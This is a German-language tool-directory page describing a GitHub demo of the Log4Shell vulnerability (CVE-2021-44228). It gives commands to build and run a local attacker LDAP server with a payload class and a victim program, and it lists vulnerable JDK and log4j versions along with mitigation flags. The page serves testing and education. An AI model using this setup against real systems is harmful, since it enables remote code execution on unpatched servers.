Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
sample-ldap-exploit — Eine kurze Demo von CVE-2021-44228 | Kitploit
Tools/GitHubGitHub/phoswald/sample-ldap-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungPayload-EntwicklungLabs & PraxisArchived
GitHubphoswald/sample-ldap-exploit

sample-ldap-exploit

Eine kurze Demo von CVE-2021-44228

Repository anzeigen
521vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

sample-ldap-exploit

Eine kurze Demo von CVE-2021-44228

Erstellen

$ mvn clean verify

Angreifer ausführen

$ java \
  -cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
  sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar

URLs:

  • http://localhost:8080/
  • http://localhost:8080/sample/payload/Payload.class

Opfer ausführen

$ java \
  -cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
  sample.victim.Victim

Ergebnisse

JDK / JRE

VersionStatus
Oracle JDK 8u5anfällig
OpenJDK 8u312NICHT anfällig (es sei denn -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
IBM OpenJDK 8u312-b07 (OpenJ9)NICHT anfällig (es sei denn -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 11.0.7+10NICHT anfällig (es sei denn -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 11.0.13+8NICHT anfällig (es sei denn -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 16+36NICHT anfällig (es sei denn -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 17+35NICHT anfällig (es sei denn -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 17.0.1+12NICHT anfällig (es sei denn -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)

Wenn NICHT anfällig, wird eine Instanz von javax.naming.Reference von javax.naming.Context.lookup() zurückgegeben.

Wenn NICHT anfällig für das Laden von Klassen aus entfernten Codebasen, bestehen andere Java-Deserialisierungsschwachstellen wahrscheinlich weiterhin!

log4j

VersionStatus
2.9.1anfällig
2.10.0anfällig (es sei denn -Dlog4j2.formatMsgNoLookups=true oder Umgebungsvariable LOG4J_FORMAT_MSG_NO_LOOKUPS=true)
2.14.1anfällig (es sei denn -Dlog4j2.formatMsgNoLookups=true oder Umgebungsvariable LOG4J_FORMAT_MSG_NO_LOOKUPS=true)
2.15.0NICHT anfällig

Wenn NICHT anfällig, wird ${jndi:ldap:...} NICHT aufgelöst.

Tool herunterladen